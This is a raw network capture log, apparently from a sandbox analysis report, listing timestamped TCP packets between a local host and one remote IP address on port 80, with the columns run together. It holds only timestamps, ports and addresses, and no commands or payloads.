                                                                                                                  Jan 1, 2025 15:02:28.072681904 CET8049763104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:28.118484020 CET4976380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:28.194967985 CET4976380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:28.195662975 CET4976480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:28.200077057 CET8049763104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:28.200498104 CET8049764104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:28.200558901 CET4976380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:28.200588942 CET4976480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:28.200762033 CET4976480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:28.205490112 CET8049764104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:28.556112051 CET4976480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:28.561018944 CET8049764104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:28.643827915 CET8049764104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:28.696554899 CET4976480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:28.899789095 CET8049764104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:28.946608067 CET4976480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:29.034379959 CET4976480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:29.035120010 CET4976580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:29.039907932 CET8049764104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:29.039925098 CET8049765104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:29.039978027 CET4976480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:29.040016890 CET4976580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:29.040119886 CET4976580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:29.044862986 CET8049765104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:29.384826899 CET4976580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:29.389731884 CET8049765104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:29.486393929 CET8049765104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:29.540334940 CET4976580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:29.541244030 CET4976580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:29.541717052 CET4976680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:29.546300888 CET8049765104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:29.546561956 CET8049766104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:29.546612024 CET4976580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:29.546648979 CET4976680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:29.546731949 CET4976680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:29.551525116 CET8049766104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:29.664339066 CET4976780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:29.669261932 CET8049767104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:29.669337034 CET4976780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:29.669495106 CET4976780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:29.674264908 CET8049767104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:29.901791096 CET4976680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:29.906732082 CET8049766104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:29.906776905 CET8049766104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:29.988141060 CET8049766104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:30.024802923 CET4976780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:30.030359983 CET8049767104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:30.040317059 CET4976680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:30.124504089 CET8049767104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:30.165431976 CET4976780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:30.290890932 CET8049766104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:30.337192059 CET4976680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:30.388788939 CET8049767104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:30.430968046 CET4976780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:30.507335901 CET4976680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:30.507559061 CET4976780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:30.508236885 CET4976880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:30.513942957 CET8049766104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:30.514008999 CET4976680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:30.514364958 CET8049768104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:30.514478922 CET8049767104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:30.514543056 CET4976880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:30.514579058 CET4976780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:30.514766932 CET4976880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:30.521462917 CET8049768104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:30.868555069 CET4976880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:30.873575926 CET8049768104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:30.960504055 CET8049768104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:31.009139061 CET4976880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:31.135643005 CET8049768104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:31.181030035 CET4976880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:31.261280060 CET4976980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:31.266166925 CET8049769104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:31.266294003 CET4976980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:31.266402960 CET4976980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:31.271897078 CET8049769104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:31.618678093 CET4976980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:31.623549938 CET8049769104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:31.739553928 CET8049769104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:31.790395021 CET4976980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:32.011548042 CET8049769104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:32.055970907 CET4976980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:32.137909889 CET4976980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:32.138730049 CET4977080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:32.142935991 CET8049769104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:32.143017054 CET4976980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:32.143537998 CET8049770104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:32.143611908 CET4977080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:32.143732071 CET4977080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:32.148468971 CET8049770104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:32.493655920 CET4977080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:32.498516083 CET8049770104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:32.591629982 CET8049770104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:32.634093046 CET4977080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:32.848536015 CET8049770104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:32.899754047 CET4977080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:32.978564978 CET4977080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:32.979182005 CET4977180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:32.983639956 CET8049770104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:32.983722925 CET4977080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:32.983931065 CET8049771104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:32.984011889 CET4977180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:32.984209061 CET4977180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:32.988974094 CET8049771104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:33.337678909 CET4977180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:33.342619896 CET8049771104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:33.447755098 CET8049771104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:33.493488073 CET4977180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:33.630218029 CET8049771104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:33.681086063 CET4977180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:33.760251045 CET4977180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:33.760921955 CET4977280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:33.765254021 CET8049771104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:33.765328884 CET4977180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:33.765707970 CET8049772104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:33.765786886 CET4977280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:33.765918016 CET4977280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:33.770648003 CET8049772104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:34.118796110 CET4977280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:34.123733997 CET8049772104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:34.210144997 CET8049772104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:34.259222031 CET4977280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:34.393392086 CET8049772104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:34.446594000 CET4977280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:34.528184891 CET4976880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:34.533200026 CET4977280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:34.534014940 CET4977380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:34.540501118 CET8049772104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:34.540576935 CET4977280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:34.541332960 CET8049773104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:34.541428089 CET4977380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:34.541537046 CET4977380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:34.548279047 CET8049773104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:34.899904966 CET4977380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:34.904841900 CET8049773104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:34.986599922 CET8049773104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:35.040338993 CET4977380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:35.244199991 CET8049773104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:35.290456057 CET4977380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:35.306688070 CET4977380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:35.307387114 CET4977480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:35.311722040 CET8049773104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:35.311803102 CET4977380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:35.312227011 CET8049774104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:35.312294006 CET4977480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:35.312424898 CET4977480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:35.317234993 CET8049774104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:35.366312027 CET4977480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:35.366945028 CET4977580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:35.371773958 CET8049775104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:35.371861935 CET4977580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:35.371989012 CET4977580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:35.376769066 CET8049775104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:35.411391973 CET8049774104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:35.687983036 CET8049774104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:35.688070059 CET4977480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:35.728172064 CET4977580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:35.733033895 CET8049775104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:35.830029964 CET8049775104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:35.884222031 CET4977580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:35.993623972 CET8049775104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:36.040508986 CET4977580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:36.115997076 CET4977580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:36.116765976 CET4977680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:36.121038914 CET8049775104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:36.121121883 CET4977580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:36.121606112 CET8049776104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:36.121670008 CET4977680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:36.121766090 CET4977680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:36.126565933 CET8049776104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:36.477971077 CET4977680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:36.482975006 CET8049776104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:36.566731930 CET8049776104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:36.618475914 CET4977680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:36.829408884 CET8049776104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:36.884138107 CET4977680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:36.918787003 CET8049776104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:36.962254047 CET4977680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.039952993 CET4977780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.044940948 CET8049777104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:37.045039892 CET4977780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.045202017 CET4977780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.049997091 CET8049777104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:37.399832010 CET4977780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.404791117 CET8049777104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:37.500730038 CET8049777104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:37.540376902 CET4977780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.746628046 CET8049777104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:37.790388107 CET4977780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.866216898 CET4977780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.866878986 CET4977880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.871325016 CET8049777104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:37.871404886 CET4977780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.871668100 CET8049778104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:37.871722937 CET4977880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.871830940 CET4977880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.876631021 CET8049778104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:38.228027105 CET4977880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:38.232918024 CET8049778104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:38.317608118 CET8049778104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:38.368567944 CET4977880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:38.596086025 CET8049778104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:38.649800062 CET4977880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:38.710607052 CET4977880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:38.711368084 CET4977980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:38.715801954 CET8049778104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:38.715903044 CET4977880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:38.718494892 CET8049779104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:38.718581915 CET4977980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:38.718750954 CET4977980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:38.724594116 CET8049779104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:39.072726011 CET4977980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.078142881 CET8049779104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:39.203114033 CET8049779104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:39.259147882 CET4977980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.471451044 CET8049779104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:39.524734020 CET4977980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.601403952 CET4977680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.603240013 CET4977980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.603945971 CET4978080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.608258009 CET8049779104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:39.608349085 CET4977980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.608795881 CET8049780104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:39.608897924 CET4978080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.608958960 CET4978080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.613769054 CET8049780104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:39.962810993 CET4978080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.967746019 CET8049780104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.052577019 CET8049780104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.102914095 CET4978080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.222353935 CET8049780104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.274751902 CET4978080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.348695040 CET4978080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.349359035 CET4978180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.353837967 CET8049780104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.354295015 CET8049781104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.354379892 CET4978080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.354398012 CET4978180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.355659962 CET4978180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.360508919 CET8049781104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.370906115 CET4978280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.376913071 CET8049782104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.377032995 CET4978280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.377151966 CET4978280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.382081032 CET8049782104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.712382078 CET4978180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.717360973 CET8049781104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.727986097 CET4978280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.732892036 CET8049782104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.733053923 CET8049782104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.826877117 CET8049781104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.832379103 CET8049782104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.868485928 CET4978180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.884113073 CET4978280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.078521967 CET8049781104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:41.083671093 CET4978280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.088488102 CET8049782104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:41.088598013 CET4978280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.089473963 CET8049782104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:41.089550018 CET4978280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.134156942 CET4978180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.210155964 CET4978180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.210813046 CET4978380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.215209007 CET8049781104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:41.215289116 CET4978180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.215656042 CET8049783104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:41.215729952 CET4978380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.215852976 CET4978380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.220730066 CET8049783104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:41.579030037 CET4978380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.584017992 CET8049783104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:41.659877062 CET8049783104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:41.712232113 CET4978380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.938122988 CET8049783104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:41.993541956 CET4978380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:42.054383039 CET4978480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:42.059264898 CET8049784104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:42.060029030 CET4978480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:42.060158014 CET4978480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:42.064922094 CET8049784104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:42.417262077 CET4978480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:42.422161102 CET8049784104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:42.507689953 CET8049784104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:42.556024075 CET4978480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:42.760242939 CET8049784104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:42.777708054 CET4978380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:42.806044102 CET4978480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.008699894 CET4978480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.010380030 CET4978580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.013843060 CET8049784104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:43.013911009 CET4978480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.015218019 CET8049785104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:43.015275955 CET4978580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.015460968 CET4978580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.020252943 CET8049785104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:43.368752956 CET4978580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.373930931 CET8049785104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:43.468702078 CET8049785104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:43.509128094 CET4978580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.732553959 CET8049785104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:43.777116060 CET4978580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.850850105 CET4978580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.851793051 CET4978680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.856729031 CET8049785104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:43.857675076 CET8049786104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:43.857762098 CET4978580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.857810974 CET4978680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.857980013 CET4978680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.863739967 CET8049786104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:44.212551117 CET4978680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:44.217473984 CET8049786104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:44.306744099 CET8049786104.21.38.84192.168.2.4
